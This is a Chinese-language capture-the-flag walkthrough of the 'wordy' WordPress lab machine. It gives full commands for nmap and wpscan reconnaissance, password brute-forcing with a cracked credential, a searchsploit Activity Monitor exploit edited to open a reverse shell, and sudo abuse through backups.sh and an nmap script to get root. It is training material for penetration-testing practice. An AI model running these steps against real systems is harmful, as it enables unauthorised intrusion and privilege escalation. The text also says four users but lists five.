信息收集
地址探测
使用arp-scan对目标主机IP地址做探测
arp-scan -l -I eth0
端口扫描
nmap -sS -sV -T4 -p- -O 172.30.1.133
-sS 使用NmapSYN扫描,秘密扫描(默认)
-sV 对服务版本检测
-T4 野蛮的扫描(常用)
-p- 扫描所有端口
-O 扫描服务器版本
http探测
通过扫描可以看到目标主机的web需要域名解析
Hosts文件优先级更高,写入格式 “IP地址 域名”
cat /etc/hosts
现在可以直接通过域名访问了
这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的
用户枚举
使用wpscan扫描和用户枚举
wpscan --url http://wordy -e u
扫描后可以看四个用户:admin、graham、mark、sarah、jens
暴力破解
Wpscan爆破
官网是由题目的,想要爆破速度快,可以先过滤这个字典文件
cat /usr/share/wordlists/rockyou.txt | grep k01 >> passwd.txt
wpscan --url http://wordy -U user.txt -P pass.txt
爆破结果:
Username: mark, Password: helpdesk01
漏洞探测及利用
登录后台
登录到管理后台,通过wp-scan扫描得到的登录地址为wp-admin
扫描插件
Wpscan对目标主机进行插件版本扫描--plugins-version detection
wpscan --plugins-version detection --url http://wordy
这个插件最新版本是20180826,目标主机使用的是20161228版本
漏洞搜索
使用searchsploit对插件进行漏洞搜索
searchsploit activity monitor
下面这两个都需要得到认证才可以利用,我们已经拿到认证了,就是网站的后台。
将html镜像到本地主机
searchsploit -m 45274.html
编辑文件
注意:原文件中的8000端口要删除,不然会自动转到8000转口。
原文件中nc -nlvp 要改成 nc -nv
根据nc得端口开启侦听
nc -lnvp 9999
修改完成后我们放到本地主机得web中。然后开启apacha2服务器。
cp 45274.html /var/www/html
systemctl start apache2
直接访问本机web服务器,例:172.30.1.20/45274.html
点击按钮提交
在我们侦听得端口就看到这里已经拿到目标主机的shell权限了
提权
信息收集
查看系统的账户文件
cat /etc/passwd
发现这里有四个用户
ls
cd mark
ls
cd stuff
ls
cat things-to-do.txt
Graham用户
Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。
su - graham
现在已经登录成功
sudo -l
使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。但是我现在是graham用户。
jens用户
这里是一个脚本文件,如果这是一个命令就不好办了。
尝试在脚本中添加一个shell,这和任务计划提权是差不多的。
方法很简单直接追加或者写入
echo "/bin/bash" >> /home/jens/backups.sh
指定jens用户运行该脚本
sudo -u jens /home/jens/backups.sh
这样就拿到了jens用户的shell
看到jens用户有Nmap的sudo授权
sudo -l
Nmap是可以通过sudo进行提权的,直接复制命令
(b)是要求版本的 (a)这个是可以直接使用的
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
直接切换到root的家目录,查看flag
cd /root
cat theflag.txt
成功拿到flag。
总结:
1、wpscan可以对wordpress网站进行用户枚举
2、枚举用户后根据用户制作一个字典,使用wpscan进行暴力破解
3、wpscan也可以对网站的插件进行版本检测,是否过时。
4、在进行提权之前一定要进行信息收集,信息收集很重要。
5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码
6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。
7、每次切换用户都要进行信息收集,所以说信息收集很重要。尤其是sudo、SUID如果不知道怎么提权可以去搜索
版权归原作者 白帽子二三 所有, 如有侵权,请联系我们删除。